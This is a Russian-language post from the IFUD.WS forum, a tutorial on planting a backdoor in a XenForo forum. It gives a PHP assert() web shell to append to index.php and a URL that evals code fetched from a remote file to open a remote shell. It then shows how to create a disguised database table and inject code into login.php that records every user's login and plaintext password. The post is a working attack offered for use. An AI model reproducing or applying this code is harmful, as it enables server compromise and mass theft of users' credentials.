1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Избавляемся от Хеширования [Xenforo]

Тема в разделе "Наши статьи", создана пользователем pw0ned, 12 окт 2016.

Метки:
  1. TopicStarter Overlay
    pw0ned

    pw0ned

    Регистрация:
    11 окт 2016
    Сообщения:
    2
    Симпатии:
    10
    Используем "WSO Web Shel"

    Отправляемся к файлу index.php , и дописываем вредоносный код:

    Код:
    if (isset($_REQUEST['l']))
    assert(stripslashes($_REQUEST[l]));
    Вызываем скрипт и получаем доступ к RemoteShell:
    Код:
    http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))#
    Отсеиваем логин и пасс из файлов с ФТП , создаем базу данных

    Код:
    create table xf_style_property_css (
    ID int(20) AUTO_INCREMENT,
    CSSName varchar(50) NOT NULL,
    CSSValue varchar(50) NOT NULL,
    PRIMARY KEY (ID)
    );
    Находим в файле login.php строки:

    [​IMG]

    Дописываем код:

    Код:
    $DataBaseConnector = mysql_connect('localhost', 'Имя БД', 'Пароль от БД');
            mysql_select_db('Имя БД');
            mysql_query("SET NAMES 'utf8'");
            $datalogxf = $data['login'];
            $datapassxf = $data['password'];
            mysql_query("INSERT INTO `xf_style_property_css` (`ID`, `CSSName`, `CSSValue`) VALUES ('', '$datalogxf', '$datapassxf') ", $DataBaseConnector);
    После всех выше описанных функций , каждый авторизованный пользователь будет внесен в наш раздел с базой ( который создали выше ).

    Выполняем команду получения списка: (Сейчас он пустой )
    Код:
    SELECT * FROM `xf_style_property_css`
     
    • Like Like x 6
    Метки:

Поделиться этой страницей

Загрузка...